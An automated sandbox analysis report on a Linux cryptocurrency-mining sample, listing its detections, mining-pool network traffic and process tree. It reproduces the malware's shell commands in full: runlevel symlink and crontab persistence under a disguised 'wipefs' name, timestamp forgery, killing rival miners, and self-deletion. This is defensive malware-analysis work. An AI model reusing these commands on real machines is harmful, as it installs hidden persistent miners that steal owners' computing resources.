Analysis Report

Overview

General Information

Joe Sandbox Version:	22.0.0
Analysis ID:	570664
Start time:	15:19:08
Joe Sandbox Product:	Cloud
Start date:	31.05.2018
Overall analysis duration:	0h 3m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	coinminer
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	CentOS Linux 7.4 x64 (Kernel 3.10.0-693, Firefox 52.6.0, Document Viewer 3.22.1)
Detection:	MAL
Classification:	mal80.evad.mine.troj.lin@0/12@2/0

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	80	0 - 100	Report FP / FN

Classification

Signature Overview

Click to jump to signature section

AV Detection:

Antivirus detection for dropped file

Show sources

Source: /usr/bin/wipefs

Avira: Label: PUA/Linux.CoinMiner.mpona

Antivirus detection for submitted file

Show sources

Source: coinminer

Avira: Label: PUA/Linux.CoinMiner.mpona

Bitcoin Miner:

Found strings related to Crypto-Mining

Show sources

Source: coinminer	String found in binary or memory: ps -ef \| grep stratum+tcp \| awk '{print $2}' \| xargs kill -9 >/dev/null 2>&1
Source: coinminer	String found in binary or memory: ps -ef \| grep stratum+tcp \| awk '{print $2}' \| xargs kill -9 >/dev/null 2>&1
Source: coinminer	String found in binary or memory: cryptonight

Networking:

Detected TCP or UDP traffic on non-standard ports

Show sources

Source: global traffic	TCP traffic: 192.168.1.101:39526 -> 163.17.30.212:8525
Source: global traffic	TCP traffic: 192.168.1.101:55686 -> 37.59.43.131:4444

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: pool.minexmr.com

Urls found in memory or binary data

Show sources

Source: coinminer	String found in binary or memory: file://
Source: coinminer	String found in binary or memory: file://hostname/
Source: coinminer	String found in binary or memory: ftp://
Source: coinminer	String found in binary or memory: ftp://%s:%s
Source: coinminer	String found in binary or memory: ftp://;type=;type=%cAccept:Could
Source: coinminer	String found in binary or memory: http://gcc.gnu.org/bugs.html):
Source: coinminer	String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html

Persistence and Installation Behavior:

Executes the "rm" command used to delete files or directories

Show sources

Source: /bin/sh (PID: 5925)

Rm executable: /bin/rm -> rm /tmp/tmpnam_KEKnmE

Sample tries to persist itself using System V runlevels

Show sources

Source: /bin/cp (PID: 5606)	File: /etc/rc.d/init.d/acpidtd
Source: /bin/ln (PID: 5617)	File: /etc/rc0.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5625)	File: /etc/rc1.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5633)	File: /etc/rc2.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5642)	File: /etc/rc3.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5650)	File: /etc/rc4.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5659)	File: /etc/rc5.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5668)	File: /etc/rc6.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5677)	File: /etc/rc.d/rc0.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5677)	File: /etc/rc.d/rc0.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5685)	File: /etc/rc.d/rc1.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5685)	File: /etc/rc.d/rc1.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5696)	File: /etc/rc.d/rc2.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5696)	File: /etc/rc.d/rc2.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5705)	File: /etc/rc.d/rc3.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5705)	File: /etc/rc.d/rc3.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5714)	File: /etc/rc.d/rc4.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5714)	File: /etc/rc.d/rc4.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5722)	File: /etc/rc.d/rc5.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5722)	File: /etc/rc.d/rc5.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5736)	File: /etc/rc.d/rc6.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5736)	File: /etc/rc.d/rc6.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5481)	File: /etc/rc0.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5490)	File: /etc/rc1.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5498)	File: /etc/rc2.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5507)	File: /etc/rc3.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5520)	File: /etc/rc4.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5529)	File: /etc/rc5.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5538)	File: /etc/rc6.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5546)	File: /etc/rc.d/rc0.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5546)	File: /etc/rc.d/rc0.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5556)	File: /etc/rc.d/rc1.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5556)	File: /etc/rc.d/rc1.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5565)	File: /etc/rc.d/rc2.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5565)	File: /etc/rc.d/rc2.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5573)	File: /etc/rc.d/rc3.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5573)	File: /etc/rc.d/rc3.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5581)	File: /etc/rc.d/rc4.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5581)	File: /etc/rc.d/rc4.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5590)	File: /etc/rc.d/rc5.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5590)	File: /etc/rc.d/rc5.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5599)	File: /etc/rc.d/rc6.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5599)	File: /etc/rc.d/rc6.d/S01wipefs -> /etc/init.d/wipefs

Sample tries to persist itself using cron

Show sources

Source: /bin/sh (PID: 5632)

File: /etc/crontab

Executes commands using a shell command-line interpreter

Show sources

Source: /tmp/coinminer (PID: 5461)	Shell command executed: sh -c "/tmp/tmpnam_KEKnmE upgrade >/dev/null 2>&1; rm /tmp/tmpnam_KEKnmE >/dev/null 2>&1"
Source: /tmp/coinminer (PID: 5455)	Shell command executed: sh -c "cp -f /tmp/coinminer /bin/wipefs>/dev/null 2>&1\nln -fs /bin/wipefs /etc/init.d/wipefs>/dev/null 2>&1\nln -fs /etc/init.d/wipefs /etc/rc0.d/S01wipefs>/dev/null 2>&1\nln -fs /etc/init.d/wipefs /etc/rc1.d/S01wipefs>/dev/null 2>&1\nln -fs /etc/init.d/wipefs /etc/rc2.d/S01wipefs>/dev/null 2>&1\nln -fs /etc/init.d/wipefs /etc/rc3.d/S01wipefs>/dev/null 2>&1\nln -fs /etc/init.d/wipefs /etc/rc4.d/S01wipefs>/dev/null 2>&1\nln -fs /etc/init.d/wipefs /etc/rc5.d/S01wipefs>/dev/null 2>&1\nln -fs /etc/init.d/wipef"
Source: /tmp/coinminer (PID: 5618)	Shell command executed: sh -c "cat /etc/crontab"
Source: /tmp/coinminer (PID: 5632)	Shell command executed: sh -c "echo '0 /6 * * root /bin/wipefs' >> /etc/crontab"
Source: /tmp/coinminer (PID: 5640)	Shell command executed: sh -c "sysctl -w vm.nr_hugepages=128 >/dev/null 2>&1"
Source: /tmp/coinminer (PID: 5667)	Shell command executed: sh -c "sysctl -p >/dev/null 2>&1"
Source: /tmp/coinminer (PID: 5694)	Shell command executed: sh -c "(touch /tmp/tmplog; chmod 666 /tmp/tmplog) >/dev/null 2>&1"
Source: /tmp/coinminer (PID: 6121)	Shell command executed: sh -c "ps -ef \| grep stratum+tcp \| awk '{print $2}' \| xargs kill -9 >/dev/null 2>&1"
Source: /tmp/coinminer (PID: 6218)	Shell command executed: sh -c "ps -ef \| grep stratum+tcp \| awk '{print $2}' \| xargs kill -9 >/dev/null 2>&1"

Executes the "chmod" command used to modify permissions

Show sources

Source: /tmp/tmpnam_KEKnmE (PID: 5595)	Chmod executable: /bin/chmod -> chmod +x /sbin/scss
Source: /tmp/tmpnam_KEKnmE (PID: 5827)	Chmod executable: /bin/chmod -> chmod +x /bin/scnetstat
Source: /bin/sh (PID: 5724)	Chmod executable: /bin/chmod -> chmod 666 /tmp/tmplog

Executes the "grep" command used to find patterns in files or piped streams

Show sources

Source: /tmp/tmpnam_KEKnmE (PID: 5828)	Grep executable: /bin/grep -> grep processor /proc/cpuinfo
Source: /tmp/tmpnam_KEKnmE (PID: 5848)	Grep executable: /bin/grep -> grep "model name" /proc/cpuinfo
Source: /tmp/tmpnam_KEKnmE (PID: 6170)	Grep executable: /bin/grep -> grep processor /proc/cpuinfo
Source: /tmp/tmpnam_KEKnmE (PID: 6174)	Grep executable: /bin/grep -> grep "model name" /proc/cpuinfo
Source: /tmp/tmpnam_KEKnmE (PID: 6267)	Grep executable: /bin/grep -> grep processor /proc/cpuinfo
Source: /tmp/tmpnam_KEKnmE (PID: 6271)	Grep executable: /bin/grep -> grep "model name" /proc/cpuinfo
Source: /bin/sh (PID: 6123)	Grep executable: /bin/grep -> grep stratum+tcp
Source: /bin/sh (PID: 6220)	Grep executable: /bin/grep -> grep stratum+tcp

Executes the "kill" command typically used to terminate processes

Show sources

Source: /bin/xargs (PID: 6129)	Kill executable: /bin/kill -> kill -9 6121 6123
Source: /bin/xargs (PID: 6224)	Kill executable: /bin/kill -> kill -9 6218 6220

Executes the "ps" command used to list the status of processes

Show sources

Source: /bin/sh (PID: 6122)	Ps executable: /bin/ps -> ps -ef
Source: /bin/sh (PID: 6219)	Ps executable: /bin/ps -> ps -ef

Executes the "touch" command used to create files or modify time stamps

Show sources

Source: /tmp/tmpnam_KEKnmE (PID: 5584)	Touch executable: /bin/touch -> touch -r /bin/sh /bin/ddus-uidgen /etc/init.d/acpidtd /etc/rc.d/rc0.d/S01acpidtd /etc/rc.d/rc1.d/S01acpidtd /etc/rc.d/rc2.d/S01acpidtd /etc/rc.d/rc3.d/S01acpidtd /etc/rc.d/rc4.d/S01acpidtd /etc/rc.d/rc5.d/S01acpidtd /etc/rc.d/rc6.d/S01acpidtd
Source: /tmp/tmpnam_KEKnmE (PID: 5641)	Touch executable: /bin/touch -> touch -r /bin/sh /sbin/ss /sbin/scss
Source: /tmp/tmpnam_KEKnmE (PID: 5854)	Touch executable: /bin/touch -> touch -r /bin/sh /bin/netstat /bin/scnetstat
Source: /bin/sh (PID: 5609)	Touch executable: /bin/touch -> touch -r /bin/sh /bin/wipefs /etc/init.d/wipefs /etc/rc.d/rc0.d/S01wipefs /etc/rc.d/rc1.d/S01wipefs /etc/rc.d/rc2.d/S01wipefs /etc/rc.d/rc3.d/S01wipefs /etc/rc.d/rc4.d/S01wipefs /etc/rc.d/rc5.d/S01wipefs /etc/rc.d/rc6.d/S01wipefs
Source: /bin/sh (PID: 5711)	Touch executable: /bin/touch -> touch /tmp/tmplog

Reads system information from the proc file system

Show sources

Source: /bin/sh (PID: 5461)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5488)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5497)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5515)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5524)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5548)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5558)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5584)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5749)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5766)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5774)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5790)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5798)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5820)	Reads from proc file: /proc/meminfo
Source: /bin/grep (PID: 5828)	Reads from proc file: /proc/cpuinfo
Source: /tmp/tmpnam_KEKnmE (PID: 5839)	Reads from proc file: /proc/meminfo
Source: /bin/grep (PID: 5848)	Reads from proc file: /proc/cpuinfo
Source: /tmp/tmpnam_KEKnmE (PID: 5860)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 6169)	Reads from proc file: /proc/meminfo
Source: /bin/grep (PID: 6170)	Reads from proc file: /proc/cpuinfo
Source: /tmp/tmpnam_KEKnmE (PID: 6173)	Reads from proc file: /proc/meminfo
Source: /bin/grep (PID: 6174)	Reads from proc file: /proc/cpuinfo
Source: /tmp/tmpnam_KEKnmE (PID: 6176)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 6266)	Reads from proc file: /proc/meminfo
Source: /bin/grep (PID: 6267)	Reads from proc file: /proc/cpuinfo
Source: /tmp/tmpnam_KEKnmE (PID: 6270)	Reads from proc file: /proc/meminfo
Source: /bin/grep (PID: 6271)	Reads from proc file: /proc/cpuinfo
Source: /tmp/tmpnam_KEKnmE (PID: 6273)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5473)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5489)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5499)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5522)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5530)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5550)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5559)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5585)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5607)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5649)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5666)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5675)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5688)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5693)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5712)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5729)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5747)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5763)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5772)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5789)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5797)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5818)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5837)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5862)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5877)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5884)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5898)	Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5909)	Reads from proc file: /proc/meminfo
Source: /bin/sh (PID: 5455)	Reads from proc file: /proc/meminfo
Source: /bin/sh (PID: 5618)	Reads from proc file: /proc/meminfo
Source: /bin/sh (PID: 5632)	Reads from proc file: /proc/meminfo
Source: /bin/sh (PID: 5640)	Reads from proc file: /proc/meminfo
Source: /bin/sh (PID: 5667)	Reads from proc file: /proc/meminfo
Source: /bin/sh (PID: 5694)	Reads from proc file: /proc/meminfo
Source: /bin/sh (PID: 6121)	Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 6122)	Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 6122)	Reads from proc file: /proc/stat
Source: /bin/sh (PID: 6218)	Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 6219)	Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 6219)	Reads from proc file: /proc/stat

Sample tries to set the executable flag

Show sources

Source: /tmp/coinminer (PID: 5454)	File: /tmp/tmpnam_KEKnmE (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 5595)	File: /sbin/scss (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 5827)	File: /bin/scnetstat (bits: - usr: rx grp: rx all: rwx)

System Summary:

Sample contains strings that are potentially command strings

Show sources

Source: Initial sample	Potential command found: w L3T$
Source: Initial sample	Potential command found: ps -ef \| grep stratum+tcp \| awk '{print $2}' \| xargs kill -9 >/dev/null 2>&1
Source: Initial sample	Potential command found: sysctl -w vm.nr_hugepages=128 >/dev/null 2>&1
Source: Initial sample	Potential command found: cd ~/ && cp -f %s .wipefs &&(crontab -l; echo "0 /6 * * `pwd`/.wipefs") \| crontab - >/dev/null 2>&1
Source: Initial sample	Potential command found: echo '0 /6 * * root /bin/wipefs' >> /etc/crontab
Source: Initial sample	Potential command found: cat /etc/crontab
Source: Initial sample	Potential command found: sysctl -p >/dev/null 2>&1
Source: Initial sample	Potential command found: crontab -l
Source: Initial sample	Potential command found: X []A\A]A^A_
Source: Initial sample	Potential command found: X %FuI
Source: Initial sample	Potential command found: X Fu
Source: Initial sample	Potential command found: w FuI1K
Source: Initial sample	Potential command found: w VG.%_
Source: Initial sample	Potential command found: ftp server doesn't support SIZE
Source: Initial sample	Potential command found: cp -f %s /bin/wipefs>/dev/null 2>&1
Source: Initial sample	Potential command found: ln -fs /bin/wipefs /etc/init.d/wipefs>/dev/null 2>&1
Source: Initial sample	Potential command found: ln -fs /etc/init.d/wipefs /etc/rc0.d/S01wipefs>/dev/null 2>&1
Source: Initial sample	Potential command found: ln -fs /etc/init.d/wipefs /etc/rc1.d/S01wipefs>/dev/null 2>&1
Source: Initial sample	Potential command found: ln -fs /etc/init.d/wipefs /etc/rc2.d/S01wipefs>/dev/null 2>&1
Source: Initial sample	Potential command found: ln -fs /etc/init.d/wipefs /etc/rc3.d/S01wipefs>/dev/null 2>&1
Source: Initial sample	Potential command found: ln -fs /etc/init.d/wipefs /etc/rc4.d/S01wipefs>/dev/null 2>&1
Source: Initial sample	Potential command found: ln -fs /etc/init.d/wipefs /etc/rc5.d/S01wipefs>/dev/null 2>&1
Source: Initial sample	Potential command found: ln -fs /etc/init.d/wipefs /etc/rc6.d/S01wipefs>/dev/null 2>&1
Source: Initial sample	Potential command found: ln -fs /etc/init.d/wipefs /etc/rc.d/rc0.d/S01wipefs>/dev/null 2>&1
Source: Initial sample	Potential command found: ln -fs /etc/init.d/wipefs /etc/rc.d/rc1.d/S01wipefs>/dev/null 2>&1
Source: Initial sample	Potential command found: ln -fs /etc/init.d/wipefs /etc/rc.d/rc2.d/S01wipefs>/dev/null 2>&1
Source: Initial sample	Potential command found: ln -fs /etc/init.d/wipefs /etc/rc.d/rc3.d/S01wipefs>/dev/null 2>&1
Source: Initial sample	Potential command found: ln -fs /etc/init.d/wipefs /etc/rc.d/rc4.d/S01wipefs>/dev/null 2>&1
Source: Initial sample	Potential command found: ln -fs /etc/init.d/wipefs /etc/rc.d/rc5.d/S01wipefs>/dev/null 2>&1
Source: Initial sample	Potential command found: ln -fs /etc/init.d/wipefs /etc/rc.d/rc6.d/S01wipefs>/dev/null 2>&1
Source: Initial sample	Potential command found: touch -r /bin/sh /bin/wipefs /etc/init.d/wipefs /etc/rc.d/rc*.d/S01wipefs>/dev/null 2>&1

Sample has stripped symbol table

Show sources

Source: ELF static info symbol of initial sample

.symtab present: no

Classification label

Show sources

Source: classification engine

Classification label: mal80.evad.mine.troj.lin@0/12@2/0

Hooking and other Techniques for Hiding and Protection:

Sample deletes itself

Show sources

Source: /bin/rm (PID: 5925)

File: /tmp/tmpnam_KEKnmE

Runtime Messages

Command:	/tmp/coinminer
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Antivirus Detection

Initial Sample

Source	Detection	Scanner	Label	Link
coinminer	100%	Avira	PUA/Linux.CoinMiner.mpona

Dropped Files

Source	Detection	Scanner	Label	Link
/usr/bin/wipefs	100%	Avira	PUA/Linux.CoinMiner.mpona

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Startup

system is lnxcentos1

coinminer (PID: 5451, Parent: 5410, MD5: 9a0629bbb97ef2c2fd8369778aa9a0d3)

coinminer New Fork (PID: 5454, Parent: 5451)

coinminer New Fork (PID: 5461, Parent: 5454)

sh (PID: 5461, Parent: 5454, MD5: df0d31d6acbb7862916223a26cc45da0)

sh New Fork (PID: 5465, Parent: 5461)

tmpnam_KEKnmE (PID: 5465, Parent: 5461, MD5: eafef5b086d1e5940ab27a617e48b7c4)

tmpnam_KEKnmE New Fork (PID: 5472, Parent: 5465)

tmpnam_KEKnmE New Fork (PID: 5479, Parent: 5472)

tmpnam_KEKnmE New Fork (PID: 5488, Parent: 5479)

tmpnam_KEKnmE New Fork (PID: 5497, Parent: 5488)

tmpnam_KEKnmE New Fork (PID: 5506, Parent: 5497)

which (PID: 5506, Parent: 5497, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)

tmpnam_KEKnmE New Fork (PID: 5515, Parent: 5488)

which (PID: 5515, Parent: 5488, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)

tmpnam_KEKnmE New Fork (PID: 5524, Parent: 5488)

tmpnam_KEKnmE New Fork (PID: 5537, Parent: 5524)

which (PID: 5537, Parent: 5524, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)

tmpnam_KEKnmE New Fork (PID: 5548, Parent: 5488)

which (PID: 5548, Parent: 5488, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)

tmpnam_KEKnmE New Fork (PID: 5558, Parent: 5488)

tmpnam_KEKnmE New Fork (PID: 5567, Parent: 5558)

chattr (PID: 5567, Parent: 5558, MD5: 429aabf876ae1d2fa2459219366d273c)

tmpnam_KEKnmE New Fork (PID: 5584, Parent: 5488)

tmpnam_KEKnmE New Fork (PID: 5597, Parent: 5584)

cp (PID: 5597, Parent: 5584, MD5: afc7c3ab2546d6d8a98854dcaaa731b3)

tmpnam_KEKnmE New Fork (PID: 5606, Parent: 5584)

cp (PID: 5606, Parent: 5584, MD5: afc7c3ab2546d6d8a98854dcaaa731b3)

tmpnam_KEKnmE New Fork (PID: 5617, Parent: 5584)

ln (PID: 5617, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)

tmpnam_KEKnmE New Fork (PID: 5625, Parent: 5584)

ln (PID: 5625, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)

tmpnam_KEKnmE New Fork (PID: 5633, Parent: 5584)

ln (PID: 5633, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)

tmpnam_KEKnmE New Fork (PID: 5642, Parent: 5584)

ln (PID: 5642, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)

tmpnam_KEKnmE New Fork (PID: 5650, Parent: 5584)

ln (PID: 5650, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)

tmpnam_KEKnmE New Fork (PID: 5659, Parent: 5584)

ln (PID: 5659, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)

tmpnam_KEKnmE New Fork (PID: 5668, Parent: 5584)

ln (PID: 5668, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)

tmpnam_KEKnmE New Fork (PID: 5677, Parent: 5584)

ln (PID: 5677, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)

tmpnam_KEKnmE New Fork (PID: 5685, Parent: 5584)

ln (PID: 5685, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)

tmpnam_KEKnmE New Fork (PID: 5696, Parent: 5584)

ln (PID: 5696, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)

tmpnam_KEKnmE New Fork (PID: 5705, Parent: 5584)

ln (PID: 5705, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)

tmpnam_KEKnmE New Fork (PID: 5714, Parent: 5584)

ln (PID: 5714, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)

tmpnam_KEKnmE New Fork (PID: 5722, Parent: 5584)

ln (PID: 5722, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)

tmpnam_KEKnmE New Fork (PID: 5736, Parent: 5584)

ln (PID: 5736, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)

touch (PID: 5584, Parent: 5488, MD5: 985a951b1a7a8dbe51973e651a365900)

tmpnam_KEKnmE New Fork (PID: 5749, Parent: 5488)

tmpnam_KEKnmE New Fork (PID: 5757, Parent: 5749)

which (PID: 5757, Parent: 5749, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)

tmpnam_KEKnmE New Fork (PID: 5766, Parent: 5488)

which (PID: 5766, Parent: 5488, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)

tmpnam_KEKnmE New Fork (PID: 5774, Parent: 5488)

tmpnam_KEKnmE New Fork (PID: 5782, Parent: 5774)

which (PID: 5782, Parent: 5774, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)

tmpnam_KEKnmE New Fork (PID: 5790, Parent: 5488)

which (PID: 5790, Parent: 5488, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)

tmpnam_KEKnmE New Fork (PID: 5798, Parent: 5488)

tmpnam_KEKnmE New Fork (PID: 5806, Parent: 5798)

chattr (PID: 5806, Parent: 5798, MD5: 429aabf876ae1d2fa2459219366d273c)

tmpnam_KEKnmE New Fork (PID: 5820, Parent: 5488)

tmpnam_KEKnmE New Fork (PID: 5828, Parent: 5820)

grep (PID: 5828, Parent: 5820, MD5: 6cd81dedcf076b9ad7cfbfec976245d5)

tmpnam_KEKnmE New Fork (PID: 5829, Parent: 5820)

uniq (PID: 5829, Parent: 5820, MD5: a83f5f379d810462d528dc460d63a04b)

tmpnam_KEKnmE New Fork (PID: 5830, Parent: 5820)

wc (PID: 5830, Parent: 5820, MD5: 1304115f965d6c9062947a3b35d9e140)

tmpnam_KEKnmE New Fork (PID: 5839, Parent: 5488)

tmpnam_KEKnmE New Fork (PID: 5848, Parent: 5839)

grep (PID: 5848, Parent: 5839, MD5: 6cd81dedcf076b9ad7cfbfec976245d5)

tmpnam_KEKnmE New Fork (PID: 5849, Parent: 5839)

uniq (PID: 5849, Parent: 5839, MD5: a83f5f379d810462d528dc460d63a04b)

tmpnam_KEKnmE New Fork (PID: 5860, Parent: 5488)

uname (PID: 5860, Parent: 5488, MD5: 81136bf3b923238a5420a003d585a68f)

tmpnam_KEKnmE New Fork (PID: 6169, Parent: 5488)

tmpnam_KEKnmE New Fork (PID: 6170, Parent: 6169)

grep (PID: 6170, Parent: 6169, MD5: 6cd81dedcf076b9ad7cfbfec976245d5)

tmpnam_KEKnmE New Fork (PID: 6171, Parent: 6169)

uniq (PID: 6171, Parent: 6169, MD5: a83f5f379d810462d528dc460d63a04b)

tmpnam_KEKnmE New Fork (PID: 6172, Parent: 6169)

wc (PID: 6172, Parent: 6169, MD5: 1304115f965d6c9062947a3b35d9e140)

tmpnam_KEKnmE New Fork (PID: 6173, Parent: 5488)

tmpnam_KEKnmE New Fork (PID: 6174, Parent: 6173)

grep (PID: 6174, Parent: 6173, MD5: 6cd81dedcf076b9ad7cfbfec976245d5)

tmpnam_KEKnmE New Fork (PID: 6175, Parent: 6173)

uniq (PID: 6175, Parent: 6173, MD5: a83f5f379d810462d528dc460d63a04b)

tmpnam_KEKnmE New Fork (PID: 6176, Parent: 5488)

uname (PID: 6176, Parent: 5488, MD5: 81136bf3b923238a5420a003d585a68f)

